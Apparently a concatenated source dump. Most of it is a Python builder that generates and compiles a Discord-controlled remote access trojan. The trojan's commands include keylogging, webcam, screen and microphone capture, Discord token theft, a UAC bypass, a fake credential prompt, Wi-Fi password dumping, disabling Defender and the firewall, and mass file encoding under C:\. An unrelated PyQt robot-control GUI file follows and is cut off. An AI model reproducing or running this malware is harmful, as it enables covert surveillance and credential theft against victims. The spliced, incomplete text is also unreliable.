kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p]
user32 = ctypes.windll.user32
user32.GetClipboardData.restype = ctypes.c_void_p
user32.OpenClipboard(0)
if user32.IsClipboardFormatAvailable(CF_TEXT):
data = user32.GetClipboardData(CF_TEXT)
data_locked = kernel32.GlobalLock(data)
text = ctypes.c_char_p(data_locked)
value = text.value
kernel32.GlobalUnlock(data_locked)
body = value.decode()
user32.CloseClipboard()
await message.channel.send("[*] Command successfuly executed : " + "Clipboard content is : " + str(body))
if message.content == "!sysinfo":
import platform
jak = str(platform.uname())
intro = jak[12:]
from requests import get
ip = get('https://api.ipify.org').text
pp = "IP Address = " + ip
await message.channel.send("[*] Command successfuly executed : " + intro + pp)
if message.content == "!geolocate":
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
link = f"http://www.google.com/maps/place/{data['latitude']},{data['longitude']}"
await message.channel.send("[*] Command successfuly executed : " + link)
if message.content == "!admincheck":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
await message.channel.send("[*] Congrats you're admin")
elif is_admin == False:
await message.channel.send("[!] Sorry, you're not admin")
if message.content == "!uacbypass":
import winreg
import ctypes
import sys
import os
import time
import inspect
def isAdmin():
try:
is_admin = (os.getuid() == 0)
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
return is_admin
if isAdmin():
await message.channel.send("Your already admin!")
else:
await message.channel.send("attempting to get admin!")
if message.content == "!uacbypass":
uncritproc()
test_str = sys.argv[0]
current_dir = inspect.getframeinfo(inspect.currentframe()).filename
cmd2 = current_dir
create_reg_path = \""" powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force \"""
os.system(create_reg_path)
create_trigger_reg_key = \""" powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force \"""
os.system(create_trigger_reg_key)
create_payload_reg_key = \"""powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start python \""" + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\\'"' + \""" -Force\"""
os.system(create_payload_reg_key)
class disable_fsr():
disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
def __enter__(self):
self.old_value = ctypes.c_long()
self.success = self.disable(ctypes.byref(self.old_value))
def __exit__(self, type, value, traceback):
if self.success:
self.revert(self.old_value)
with disable_fsr():
os.system("fodhelper.exe")
time.sleep(2)
remove_reg = \""" powershell Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force \"""
os.system(remove_reg)
if message.content == "!startkeylogger":
import base64
import os
from pynput.keyboard import Key, Listener
import logging
temp = os.getenv("TEMP")
log_dir = temp
logging.basicConfig(filename=(log_dir + r"\key_log.txt"),
level=logging.DEBUG, format='%%(asctime)s: %%(message)s')
def keylog():
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
import threading
global test
test = threading.Thread(target=keylog)
test._running = True
test.daemon = True
test.start()
await message.channel.send("[*] Keylogger successfuly started")
if message.content == "!stopkeylogger":
import os
test._running = False
await message.channel.send("[*] Keylogger successfuly stopped")
if message.content == "!idletime":
class LASTINPUTINFO(Structure):
_fields_ = [
('cbSize', c_uint),
('dwTime', c_int),
]
def get_idle_duration():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
if windll.user32.GetLastInputInfo(byref(lastInputInfo)):
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
else:
return 0
import threading
global idle1
idle1 = threading.Thread(target=get_idle_duration)
idle1._running = True
idle1.daemon = True
idle1.start()
duration = get_idle_duration()
await message.channel.send('User idle for %%.2f seconds.' % duration)
import time
time.sleep(1)
if message.content.startswith("!voice"):
volumeup()
import win32com.client as wincl
speak = wincl.Dispatch("SAPI.SpVoice")
speak.Speak(message.content[7:])
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!blockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(True)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content.startswith("!unblockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!streamwebcam" :
await message.channel.send("[*] Command successfuly executed")
import os
import time
import cv2
import threading
import sys
import pathlib
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
running = message.content
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
delelelee = "del " + file + r" /f"
os.system(delelelee)
os.system(r"RMDIR %temp%\hobo /s /q")
while True:
return_value, image = camera.read()
cv2.imwrite(temp + r"\\temp.png", image)
boom = discord.File(temp + r"\\temp.png", filename="temp.png")
kool = await message.channel.send(file=boom)
temp = (os.getenv('TEMP'))
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
del camera
break
else:
continue
if message.content == "!stopwebcam":
import os
os.system(r"mkdir %temp%\hobo")
os.system(r"echo hello>%temp%\hobo\hello.txt")
os.system(r"del %temp\\temp.png /F")
if message.content == "!getdiscordinfo":
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\\\\Discord",
"Discord Canary": ROAMING + "\\\\discordcanary",
"Discord PTB": ROAMING + "\\\\discordptb",
"Google Chrome": LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",
"Opera": ROAMING + "\\\\Opera Software\\Opera Stable",
"Brave": LOCAL + "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default",
"Yandex": LOCAL + "\\\\Yandex\\\\YandexBrowser\\\\User Data\\Default"
}
def getHeader(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
headers.update({"Authorization": token})
return headers
def getUserData(token):
try:
return loads(
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode())
except:
pass
def getTokenz(path):
path += "\\\\Local Storage\\\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def whoTheFuckAmI():
ip = "None"
try:
ip = urlopen(Request("https://ifconfig.me")).read().decode().strip()
except:
pass
return ip
def hWiD():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\\n")[1]
def getFriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships",
headers=getHeader(token))).read().decode())
except:
pass
def getChat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token),
data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def paymentMethods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=getHeader(token))).read().decode())) > 0)
except:
pass
def sendMessages(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token,
"multipart/form-data; boundary=---------------------------325414537030329320151394843687"),
data=form_data.encode())).read().decode()
except:
pass
def main():
cache_path = ROAMING + "\\\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = whoTheFuckAmI()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in getTokenz(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getUserData(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(paymentMethods(token))
embed = f\"""
Email: {email}
Phone: {phone}
Nitro: {nitro}
Billing Info: {billing}
value: IP: {ip}
Username: {pc_username}
PC Name: {pc_name}
Token Location: {platform}
Token : {token}
username: {username} ({user_id})
\"""
return str(embed)
try:
embed = main()
await message.channel.send("[*] Command successfuly executed\\n"+str(embed))
except Exception as e:
pass
if message.content == "!streamscreen" :
await message.channel.send("[*] Command successfuly executed")
import os
from mss import mss
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
os.system(r"del %temp%\hobos\hellos.txt /f")
os.system(r"RMDIR %temp%\hobos /s /q")
else:
pass
while True:
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send(file=file)
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
break
else:
continue
if message.content == "!stopscreen":
import os
os.system(r"mkdir %temp%\hobos")
os.system(r"echo hello>%temp%\hobos\hellos.txt")
os.system(r"del %temp%\monitor.png /F")
if message.content == "!shutdown":
import os
uncritproc()
os.system("shutdown /p")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!restart":
import os
uncritproc()
os.system("shutdown /r /t 00")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!logoff":
import os
uncritproc()
os.system("shutdown /l /f")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!bluescreen":
import ctypes
import ctypes.wintypes
ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, ctypes.byref(ctypes.wintypes.DWORD()))
if message.content == "!currentdir":
import subprocess as sp
output = sp.getoutput('cd')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!displaydir":
import subprocess as sp
import time
import os
import subprocess
def shell():
output = subprocess.run("dir", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output22.txt"):
os.system(r"del %temp%\output22.txt /f")
f1 = open(temp + r"\output22.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output22.txt", filename="output22.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content == "!dateandtime":
import subprocess as sp
output = sp.getoutput(r'echo time = %time%% date = %%date%')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!listprocess":
import subprocess as sp
import time
import os
import subprocess
def shell():
output = subprocess.run("tasklist", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output.txt"):
os.system(r"del %temp%\output.txt /f")
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content.startswith("!prockill"):
import os
proc = message.content[10:]
kilproc = r"taskkill /IM" + ' "' + proc + '" ' + r"/f"
import time
import os
import subprocess
os.system(kilproc)
import subprocess
time.sleep(2)
process_name = proc
call = 'TASKLIST', '/FI', 'imagename eq %%s' % process_name
output = subprocess.check_output(call).decode()
last_line = output.strip().split('\\r\\n')[-1]
done = (last_line.lower().startswith(process_name.lower()))
if done == False:
await message.channel.send("[*] Command successfuly executed")
elif done == True:
await message.channel.send('[*] Command did not exucute properly')
if message.content.startswith("!recscreen"):
import cv2
import numpy as np
import pyautogui
reclenth = float(message.content[10:])
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
if input3 >= reclenth:
break
else:
continue
import os
SCREEN_SIZE = (1920, 1080)
fourcc = cv2.VideoWriter_fourcc(*"XVID")
temp = (os.getenv('TEMP'))
videeoo = temp + r"\output.avi"
out = cv2.VideoWriter(videeoo, fourcc, 20.0, (SCREEN_SIZE))
counter = 1
while True:
counter = counter + 1
img = pyautogui.screenshot()
frame = np.array(img)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out.write(frame)
if counter >= input2:
break
out.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.avi"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.avi /f")
else:
file = discord.File(check, filename="output.avi")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.avi /f")
if message.content.startswith("!reccam"):
import cv2
import numpy as np
import pyautogui
input1 = float(message.content[8:])
import cv2
import os
temp = (os.getenv('TEMP'))
vid_capture = cv2.VideoCapture(0)
vid_cod = cv2.VideoWriter_fourcc(*'XVID')
loco = temp + r"\output.mp4"
output = cv2.VideoWriter(loco, vid_cod, 20.0, (640,480))
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
ret,frame = vid_capture.read()
output.write(frame)
if input3 >= input1:
break
else:
continue
vid_capture.release()
output.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.mp4"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.mp4 /f")
else:
file = discord.File(check, filename="output.mp4")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.mp4 /f")
if message.content.startswith("!recaudio"):
import cv2
import numpy as np
import pyautogui
import os
import sounddevice as sd
from scipy.io.wavfile import write
seconds = float(message.content[10:])
temp = (os.getenv('TEMP'))
fs = 44100
laco = temp + r"\output.wav"
myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)
sd.wait()
write(laco, fs, myrecording)
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.wav"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.wav /f")
else:
file = discord.File(check, filename="output.wav")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.wav /f")
if message.content.startswith("!delete"):
global statue
import time
import subprocess
import os
instruction = message.content[8:]
instruction = "del " + '"' + instruction + '"' + " /F"
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
global statue
statue = "ok"
if statue:
numb = len(result)
if numb > 0:
await message.channel.send("[*] an error has occurred")
else:
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
statue = None
if message.content == "!disableantivirus":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import subprocess
instruction = \""" REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" | findstr /I /C:"CurrentBuildnumber" \"""
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
done = result.split()
boom = done[2:]
if boom <= ['17763']:
os.system(r"Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet")
await message.channel.send("[*] Command successfuly executed")
elif boom >= ['18362']:
os.system(r\"""powershell Add-MpPreference -ExclusionPath "C:\\\\" \""")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] An unknown error has occurred")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!disablefirewall":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
os.system(r"NetSh Advfirewall set allprofiles state off")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content.startswith("!audio"):
import os
temp = (os.getenv("TEMP"))
temp = temp + r"\audiofile.wav"
if os.path.isfile(temp):
delelelee = "del " + temp + r" /f"
os.system(delelelee)
temp1 = (os.getenv("TEMP"))
temp1 = temp1 + r"\sounds.vbs"
if os.path.isfile(temp1):
delelee = "del " + temp1 + r" /f"
os.system(delelee)
await message.attachments[0].save(temp)
temp2 = (os.getenv("TEMP"))
f5 = open(temp2 + r"\sounds.vbs", 'a')
result = \""" Dim oPlayer: Set oPlayer = CreateObject("WMPlayer.OCX"): oPlayer.URL = \""" + '"' + temp + '"' \""": oPlayer.controls.play: While oPlayer.playState <> 1 WScript.Sleep 100: Wend: oPlayer.close \"""
f5.write(result)
f5.close()
os.system(r"start %temp%\sounds.vbs")
await message.channel.send("[*] Command successfuly executed")
#if adding startup n stuff this needs to be edited to that
if message.content == "!selfdestruct": #prob beter way to do dis
import inspect
import os
import sys
import inspect
uncritproc()
cmd2 = inspect.getframeinfo(inspect.currentframe()).filename
hello = os.getpid()
bat = \"""@echo off\""" + " & " + "taskkill" + r" /F /PID " + str(hello) + " &" + " del " + '"' + cmd2 + '"' + r" /F" + " & " + r\"""start /b "" cmd /c del "%~f0"& taskkill /IM cmd.exe /F &exit /b\"""
temp = (os.getenv("TEMP"))
temp5 = temp + r"\delete.bat"
if os.path.isfile(temp5):
delelee = "del " + temp5 + r" /f"
os.system(delelee)
f5 = open(temp + r"\delete.bat", 'a')
f5.write(bat)
f5.close()
os.system(r"start /min %temp%\delete.bat")
if message.content == "!windowspass":
import sys
import subprocess
import os
cmd82 = "$cred=$host.ui.promptforcredential('Windows Security Update','',[Environment]::UserName,[Environment]::UserDomainName);"
cmd92 = 'echo $cred.getnetworkcredential().password;'
full_cmd = 'Powershell "{} {}"'.format(cmd82,cmd92)
instruction = full_cmd
def shell():
output = subprocess.run(full_cmd, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("password user typed in is: " + result)
if message.content == "!displayoff":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
WM_SYSCOMMAND = 274
HWND_BROADCAST = 65535
SC_MONITORPOWER = 61808
ctypes.windll.user32.BlockInput(True)
ctypes.windll.user32.SendMessageW(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 2)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!displayon":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
from pynput.keyboard import Key, Controller
keyboard = Controller()
keyboard.press(Key.esc)
keyboard.release(Key.esc)
keyboard.press(Key.esc)
keyboard.release(Key.esc)
ctypes.windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!hide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system(\"""attrib +h "{}" \""".format(cmd237))
await message.channel.send("[*] Command successfuly executed")
if message.content == "!unhide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system(\"""attrib -h "{}" \""".format(cmd237))
await message.channel.send("[*] Command successfuly executed")
#broken. might fix if someone want me too.
if message.content == "!decode" or message.content == "!encode":
import os
import base64
def encode(file):
f = open(file)
data = f.read()
f.close()
data = data.encode("utf-8")
encodedBytes = base64.b64encode(data)
os.remove(file)
file = file + '.rip'
t = open(file, "w+")
encodedBytes = encodedBytes.decode("utf-8")
t.write(encodedBytes)
t.close()
def decode(file):
f = open(file)
data = f.read()
f.close()
data = data.encode("utf-8")
decodedBytes = base64.b64decode(data)
os.remove(file)
file = file.replace('.rip', '')
t = open(file, "w+")
decodedBytes = decodedBytes.decode("utf-8")
t.write(decodedBytes)
t.close()
parentDirectory = 'C:\\\\'
for root, dirs, files in os.walk(parentDirectory):
for afile in files:
full_path = os.path.join(root, afile)
if message.content == "!encode":
encode(full_path)
await message.channel.send("[*] Command successfuly executed")
if message.content == ('!decode') and full_path.endswith('.rip'):
decode(full_path)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!ejectcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door open', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!retractcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door closed', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!critproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
critproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content == "!uncritproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
uncritproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content.startswith("!website"):
import subprocess
website = message.content[9:]
def OpenBrowser(URL):
if not URL.startswith('http'):
URL = 'http://' + URL
subprocess.call('start ' + URL, shell=True)
OpenBrowser(website)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!distaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statuuusss
import time
statuuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statuuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
import winreg as reg
reg.CreateKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
else:
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!enbtaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statusuusss
import time
statusuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statusuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
await message.channel.send("[*] Command successfuly executed")
else:
import winreg as reg
reg.DeleteKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!getwifipass":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import os
import subprocess
import json
x = subprocess.run("NETSH WLAN SHOW PROFILE", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
x = x[x.find("User profiles\\r\\n-------------\\r\\n")+len("User profiles\\r\\n-------------\\r\\n"):len(x)].replace('\\r\\n\\r\\n"',"").replace('All User Profile', r'"All User Profile"')[4:]
lst = []
done = []
for i in x.splitlines():
i = i.replace('"All User Profile" : ',"")
b = -1
while True:
b = b + 1
if i.startswith(" "):
i = i[1:]
if b >= len(i):
break
lst.append(i)
lst.remove('')
for e in lst:
output = subprocess.run('NETSH WLAN SHOW PROFILE "' + e + '" KEY=CLEAR ', stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
for i in output.splitlines():
if i.find("Key Content") != -1:
ok = i[4:].replace("Key Content : ","")
break
almoast = '"' + e + '"' + ":" + '"' + ok + '"'
done.append(almoast)
await message.channel.send("[*] Command successfuly executed")
await message.channel.send(done)
else:
await message.channel.send("[*] This command requires admin privileges")
client.run(token)""".replace("~~TOKENHERE~~", tokenbot))
except Exception as e:
print(f"""\n\n\n\n{y}[{Fore.LIGHTRED_EX }!{y}]{w} Error writing file: {e}""")
os.system(2)
os.system('cls')
main()
print(f"""\n\n\n{y}[{Fore.LIGHTGREEN_EX }!{y}]{w} File has been correctly written to "temp/{fileName}.py" """)
convert = input(f"""\n{y}[{w}#{y}]{w} Convert your script into an executable (Y/N) ? """)
if convert == 'Y' or convert == 'y':
time.sleep(1)
os.system('cls')
print(f'{y}[{b}#{y}]{w} File creation...')
time.sleep(1)
# Note! There is an issue with this, see https://github.com/opencv/opencv/issues/14064 if you cannot compile the exe
# To fix this, add --paths to the pyinstaller command, and point to Python39\site-packages\cv2\python-3.9
os.system(f"pyinstaller -y -F -w --distpath temp --specpath temp --workpath temp temp/{fileName}.py")
os.system('cls')
print(f'{y}[{b}#{y}]{w} Cleaning up old files...')
time.sleep(1)
os.remove(f"temp/{fileName}.spec")
shutil.rmtree(f"temp/{fileName}")
shutil.rmtree(f"temp/__pycache__")
time.sleep(1)
os.system('cls')
discordrattitle()
print(f"""{y}[{Fore.LIGHTGREEN_EX }!{y}]{w} The executable file has been correctly generated""")
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
else:
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
discordrat()
|
GUI.py
|
from PyQt5 import QtCore, QtGui, uic, QtWidgets
from teachablerobots.src.GridSpace import *
from teachablerobots.src.RobotTracker import *
import sys
import cv2
import numpy as np
import threading
from multiprocessing import Process, Queue, Event
import time
import socket
import subprocess
formXML = uic.loadUiType("/home/tdarrah/Documents/teachablerobots/src/robotGUI1.ui")[0]
class App():
'''The parent application that runs the window and actual GUI'''
def __init__(self):
        '''Initializes the application and its dependencies.'''
self.app = QtWidgets.QApplication(sys.argv)
self.gs = GridSpace()
self.r = object
self.w = MainWindow(self)
self.w.setWindowTitle("Robot Command Interface")
self.running = False
self.robotIP = "1.1.1.1"
self.problemStage = 0
self.scanned = False
self.updateThread = threading.Thread(target=self.Update)
self.commSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def Run(self):
'''The entry point into the program. This actually calls the Run function
in the MainWindow class.'''
self.w.show()
self.app.exec_()
def Update(self):
        '''Handles the GridSpace camera feed and keeps gs.frame updated,
        which is what is displayed in the app.'''
while(self.running):
if(type(self.r) == Robot):
self.gs.Update(lambda: self.gs.ProcessFrame(self.r.low, self.r.high))
self.r.FindRobot()
self.r.FrameOverlay()
else:
self.gs.Update(lambda: self.gs.ProcessFrame((0,0,0), (180,360,360)))
def ConnectRobot(self):
'''This connects to the robot'''
if(self.problemStage == 0):
if(self.w.colorSelection.currentText() == "robot color"):
